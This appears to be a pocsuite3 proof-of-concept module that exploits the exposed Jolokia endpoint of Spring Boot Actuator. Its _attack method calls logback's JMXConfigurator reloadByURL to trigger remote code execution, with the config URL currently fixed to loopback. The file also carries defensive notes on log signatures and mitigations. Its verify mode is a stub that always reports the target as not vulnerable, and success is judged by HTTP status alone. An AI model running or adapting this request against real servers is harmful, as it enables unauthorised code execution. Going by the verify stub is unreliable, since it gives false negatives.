spring_boot_jolokia_1_4_rce.py
"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
For more information, please visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, get_listener_ip, get_listener_port, \
VUL_TYPE
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.utils import random_str, generate_shellcode_list
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import REVERSE_PAYLOAD
class DemoPOC(POCBase):
    """pocsuite3 PoC for the Jolokia endpoint exposed by Spring Boot Actuator.

    Only ``_attack`` sends traffic: a single GET that invokes the
    ``reloadByURL`` operation of logback's ``JMXConfigurator`` MBean through
    ``/jolokia/exec/``. ``_verify`` is a stub that always reports the target
    as not vulnerable, so a failed verify run says nothing about exposure.

    Defensive notes: the request is visible in access logs as a
    ``/jolokia/exec/`` path naming ``JMXConfigurator`` and ``reloadByURL``,
    and a successful call makes the application fetch a logback
    configuration over HTTP. Keeping the Jolokia endpoint disabled or behind
    authentication, and denying ``exec`` on this MBean with a Jolokia access
    policy, removes the exposure.
    """

    vulID = '0'  # ssvid
    version = '1.0'
    author = ['funny']
    vulDate = '2019-12-7'
    createDate = '2019-12-7'
    # "Spring boot Actuator jolokia remote code execution vulnerability"
    name = 'Spring boot Actuator jolokia 远程代码执行漏洞'
    appPowerLink = 'http://www.jolokia.org/'
    appName = 'Spring boot Actuator jolokia'
    # "Enabled by default in spring boot 1.4, disabled by default from 1.5 on"
    appVersion = 'spring boot1.4该配置默认开启,1.5版本之后默认关闭'
    vulType = VUL_TYPE.CODE_EXECUTION
    # "Spring Boot Actuator helps monitor and manage Spring Boot applications;
    # jolokia is an open-source project implementing JMX, but in Spring Boot a
    # misconfigured jolokia can be used for remote command execution."
    desc = '''Spring Boot Acuator 可以帮助你监控和管理Spring Boot应用,jolokia 是一个实现JMX的开源项目,
但是在spring boot中,利用jolokia配置不当可以实现远程命令执行'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _verify(self):
        """Report the target as not vulnerable without sending any request.

        The result dict is always empty, so ``parse_output`` always takes its
        failure branch. Verify mode is therefore not a usable exposure check.
        """
        return self.parse_output({})

    def _attack(self):
        """Send the Jolokia ``reloadByURL`` request and report on the reply.

        The configuration URL embedded in the path is the fixed value
        ``http://127.0.0.1:8080/logback.xml`` (``!/`` is Jolokia's escape for
        a slash), i.e. the target's own loopback address.

        Returns:
            The ``Output`` from ``parse_output``; it is marked successful
            whenever the HTTP status is 200, with the response body stored
            under ``ShellInfo.Content``.
        """
        jolokia_path = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8080!/logback.xml"
        target = self.url + jolokia_path
        logger.info("url: {}".format(target))
        response = requests.get(
            target,
            headers={"Content-Type": "application/x-www-form-urlencoded"},
        )

        findings = {}
        # NOTE(review): only the HTTP status is checked. Jolokia can answer
        # HTTP 200 with an error status inside the JSON body, so a "success"
        # here is not proof that the operation ran - confirm against the body.
        if response.status_code == 200:
            findings['ShellInfo'] = {'Content': response.text}
        return self.parse_output(findings)

    # This class defines no _shell mode.

    def parse_output(self, result):
        """Wrap *result* in an ``Output``: success if non-empty, else failure."""
        report = Output(self)
        if not result:
            report.fail('target is not vulnerable')
            return report
        report.success(result)
        return report
# Hand the PoC class to pocsuite3 so the framework can load and run it.
register_poc(DemoPOC)